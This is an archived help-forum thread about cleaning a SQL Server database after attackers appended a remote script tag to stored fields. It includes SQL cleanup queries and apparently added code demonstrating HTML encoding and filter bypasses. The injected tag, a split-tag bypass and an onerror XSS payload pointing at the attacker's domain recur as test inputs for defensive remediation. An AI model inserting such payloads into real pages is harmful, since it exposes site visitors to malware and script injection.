Solved

Need to remove an 'unauthorized' script from database fields - help/suggestions

Posted on 2008-06-16
442 Views
Last Modified: 2013-11-15
Here's the deal, some jerk-offs infiltrated my website database with this:

<script src=http://www.clsidw.com/b.js></script>

They were able to insert this into some of the fields in my database, and my most recent backup was done after they did it, so I can't go back. Now, I need to get into the database and erase this entry in whatever fields they got into.

1 What is the fastest way to accomplish this?

2 What database software should I use keeping in mind I probably will never use it again, so cost IS a consideration.

3 Is there a way to clear this automatically or in a batch?

FWIW, they DID NOT overwrite the fields, they simply ADDED this to them.
Question by:bishopandsix
12 Comments
 
LVL 24

Expert Comment

by:Tomas Helgi Johannsson
ID: 21798262
        HI!

Have you tried Toad for MySQL (www.toadsoft.com) ?
It's free and very good DBA tool to make changes to your database.

What you can do is do an update on each table and put an empty string instead of the script string for fields that are
just chars / varchars.
With text fields (TEXT, MEDIUMTEXT, LONGTEXT) or BLOB fields it might be a little trickier.
What you can do is use mysqldump to dump the database(s) to an SQL file and use a
text editor (like WordPad/Notepad if you use Windows) to search and replace the script text with blanks
and then restore the database with the altered backup SQL file.
See the manual for further info
http://dev.mysql.com/doc/refman/5.0/en/mysqldump.html

Regards,
   Tomas Helgi
 
LVL 7

Expert Comment

by:Zippit
ID: 21798294
this is a pretty standard attack against websites that allow HTML embedded into their comments.  If it's in comments and you don't mind just blowing away the offending comment (not other comments, just the one with the offending html in it), then something like the following will work (run this in a query tool):

DELETE FROM tbl_myComment_Table
WHERE str_text_field like '%http://www.clsidw.com/b.js%'


 

Author Comment

by:bishopandsix
ID: 21798300
I'm sorry, I think my Database is MS SQL, does Toad work with that? I am a complete beginner when it comes to database stuff.
 
LVL 7

Expert Comment

by:Zippit
ID: 21798303
If you are running ASP or ASP.NET it would be a good idea to HTMLEncode all user submitted input.  This will prevent this attack from working in the future.  Use a line like the following to do so:


userInput = Server.HtmlEncode(userInput)
 

Author Comment

by:bishopandsix
ID: 21798370
"this is a pretty standard attack against websites that allow HTML embedded into their comments.  If it's in comments and you don't mind just blowing away the offending comment (not other comments, just the one with the offending html in it), then something like the following will work (run this in a query tool):

DELETE FROM tbl_myComment_Table
WHERE str_text_field like '%http://www.clsidw.com/b.js%'"

If I do this, will it eliminate ONLY the added script, or will it eliminate everything in the field? Also, what software should I use to do this with?
 

Author Comment

by:bishopandsix
ID: 21798392
"If you are running ASP or ASP.NET it would be a good idea to HTMLEncode all user submitted input.  This will prevent this attack from working in the future.  Use a line like the following to do so:


userInput = Server.HtmlEncode(userInput)"

If I do this, will it still allow me to use HTML in some of my fields? What does this function do exactly.
 
LVL 7

Accepted Solution

by:
Zippit earned 500 total points
ID: 21798790
The delete will delete all data in the entire affected record.  If the malicious script tag is in a comment you probably want to do that anyway.  If you just want to remove the "script" tag then you are going to need to write a program/script to loop through all your records and update the field with the value with the malicious script tag removed.

If you want to see what records will be deleted run the following:

SELECT *
FROM  tbl_myComment_Table
WHERE str_text_field like '%http://www.clsidw.com/b.js%'

You will need a query tool to run this against.  If you are using MSSQL then use either Query Analyzer or SQL Server Management Studio (they come with SQL Server Standard or Enterprise).
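The accepted answer above says the DELETE drops the whole record and that keeping the rest of the field means a script that loops over the rows and updates them. The following is an added example, not code from the thread, that puts the two cleanups side by side on constructed sample rows in an in-memory SQLite database (used here only as a stand-in that runs offline; the table and column names tbl_myComment_Table and str_text_field are the placeholders from the thread): the SELECT preview, the DELETE, and an UPDATE that uses REPLACE() to remove just the appended tag. REPLACE(column, old, new) has the same signature in SQLite, MySQL and T-SQL, so the same UPDATE runs in SQL Server; the T-SQL form is included as a string for reference, with the CAST that SQL Server 2005 or later needs when the column is TEXT/NTEXT.

```python
import sqlite3

# Constructed sample data, not rows from the original site: two comments with
# the injected tag appended to otherwise legitimate text, and one untouched row.
INJECTED_TAG = '<script src=http://www.clsidw.com/b.js></script>'
MARKER = 'http://www.clsidw.com/b.js'
SAMPLE_ROWS = [
    (1, 'Great article, thanks!' + INJECTED_TAG),
    (2, 'Second comment' + INJECTED_TAG),
    (3, 'Untouched comment'),
]

# T-SQL equivalent for SQL Server 2005 or later (reference only, not run here).
# REPLACE() rejects TEXT/NTEXT arguments, so those columns are CAST first.
TSQL_STRIP = """
UPDATE tbl_myComment_Table
SET str_text_field = REPLACE(CAST(str_text_field AS VARCHAR(MAX)),
                             '<script src=http://www.clsidw.com/b.js></script>', '')
WHERE str_text_field LIKE '%http://www.clsidw.com/b.js%'
"""


def load_sample_db():
    """Build an in-memory SQLite table with the thread's placeholder names."""
    conn = sqlite3.connect(':memory:')
    conn.execute('CREATE TABLE tbl_myComment_Table '
                 '(id INTEGER PRIMARY KEY, str_text_field TEXT)')
    conn.executemany('INSERT INTO tbl_myComment_Table VALUES (?, ?)', SAMPLE_ROWS)
    conn.commit()
    return conn


def find_infected(conn, marker=MARKER):
    """Preview step (the SELECT from the accepted answer): ids of rows that
    still contain the marker. Run it before and again after any cleanup."""
    rows = conn.execute(
        'SELECT id FROM tbl_myComment_Table WHERE str_text_field LIKE ? ORDER BY id',
        ('%' + marker + '%',)).fetchall()
    return [r[0] for r in rows]


def strip_injected_tag(conn, tag=INJECTED_TAG):
    """Surgical cleanup: REPLACE removes only the exact appended tag and keeps
    the rest of the field. Returns the number of rows changed."""
    cur = conn.execute(
        "UPDATE tbl_myComment_Table "
        "SET str_text_field = REPLACE(str_text_field, ?, '') "
        "WHERE str_text_field LIKE ?",
        (tag, '%' + tag + '%'))
    conn.commit()
    return cur.rowcount


def delete_infected_rows(conn, marker=MARKER):
    """Blunt cleanup (the DELETE from the thread): drops every affected record
    in full, legitimate text included. Returns the number of rows removed."""
    cur = conn.execute(
        'DELETE FROM tbl_myComment_Table WHERE str_text_field LIKE ?',
        ('%' + marker + '%',))
    conn.commit()
    return cur.rowcount


def field_values(conn):
    """Current contents of the table keyed by id, for checking the result."""
    return dict(conn.execute(
        'SELECT id, str_text_field FROM tbl_myComment_Table ORDER BY id').fetchall())


if __name__ == '__main__':
    db = load_sample_db()
    print('infected before:', find_infected(db))
    print('rows updated:', strip_injected_tag(db))
    print('infected after:', find_infected(db))
    print(field_values(db))
```

Run the SELECT first and take a backup of the table before the UPDATE, then compare the UPDATE's row count with the SELECT's and re-run the SELECT afterwards: REPLACE only removes the exact string, so any row where the attacker used a variant (different spacing, case or quoting) will still show up and needs its own pass.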
 
LVL 7

Expert Comment

by:Zippit
ID: 21798801

"userInput = Server.HtmlEncode(userInput)"

If I do this, will it still allow me to use HTML in some of my fields? What does this function do exactly.

"YOU" can as the administrator.  But if you put that code in your comments submission code (or wherever the user's submitted the malicious script tags) then they will no longer be able to use HTML of any kind.

If you want them to be able to continue using HTML then you will have to write a "smart" filter that strips out possibly malicious tags like <script>.  But that's easier said than done.
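To show what Server.HtmlEncode does to the injected tag, and why the "smart" tag-stripping filter is harder than it looks, here is an added example in Python (not from the thread; html.escape stands in for Server.HtmlEncode, and the inputs are constructed): the encoder turns the tag into inert text, while a single-pass strip-the-script-tag filter removes the original tag but is defeated by a tag split around another tag, and does nothing against a payload carried in an event-handler attribute with no <script> at all. The sanitize_submission helper, and its trusted_author flag, is an assumed convention for the administrator exception the reply above describes, not the questioner's code.

```python
import html
import re

# Constructed test inputs, not data from the original site.
INJECTED_TAG = '<script src=http://www.clsidw.com/b.js></script>'
# Single-pass strip filters are defeated by a tag nested inside a split tag:
# removing the inner <script> re-assembles the outer one.
SPLIT_TAG = '<scr<script>ipt src=http://www.clsidw.com/b.js></script>'
# No <script> at all: the payload rides on an event-handler attribute.
EVENT_HANDLER = '<img src=x onerror="location.href=\'http://www.clsidw.com/\'">'

_SCRIPT_TAG = re.compile(r'</?script[^>]*>', re.IGNORECASE)


def html_encode(user_input):
    """Stand-in for ASP's Server.HtmlEncode: &, <, >, " and ' become entities,
    so the browser shows the text literally instead of parsing it as markup."""
    return html.escape(user_input, quote=True)


def naive_strip_script(user_input):
    """The kind of 'smart filter' the reply warns about: removes <script ...>
    and </script> tags in one pass and passes everything else through."""
    return _SCRIPT_TAG.sub('', user_input)


def browser_sees_tag(markup):
    """True if the value still contains something a browser would parse as
    a tag (any raw '<' is enough for this demonstration)."""
    return '<' in markup


def sanitize_submission(user_input, trusted_author=False):
    """Assumed convention for the submission handler: the administrator's own
    HTML is stored as-is, anything a visitor submits is encoded first."""
    return user_input if trusted_author else html_encode(user_input)


if __name__ == '__main__':
    for label, sample in (('injected', INJECTED_TAG),
                          ('split', SPLIT_TAG),
                          ('handler', EVENT_HANDLER)):
        print(label, 'strip ->', naive_strip_script(sample))
        print(label, 'encode ->', html_encode(sample))
```

Encoding at submission time, as the reply suggests, stops new payloads from being stored, but it does nothing for rows that are already in the database; encoding again at the point where the field is written into the page covers both. html.escape encodes both quote characters, which the ASP encoders may or may not do depending on version; that difference only matters for values placed inside attributes, not for the tag shown here.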
 

Author Comment

by:bishopandsix
ID: 21799232
Still need some help with what software to use to accomplish the database cleaning. The database is MSSQL as far as I know.
 
LVL 7

Expert Comment

by:Zippit
ID: 21807259
what product are you using for your site?  If it's open source I will take a look for the schema and might be able to whip something up real quick.

Is the site hosted on your server or are you renting server space/web space?
 

Author Comment

by:bishopandsix
ID: 21808309
Absolutely no idea what product. I'll get with my host in the morning and ask.
 

Author Closing Comment

by:bishopandsix
ID: 31467804
Thanks, your help got me going in the right direction and I was able to clean the records with only a slight amount of additional info I found by doing some Google searches.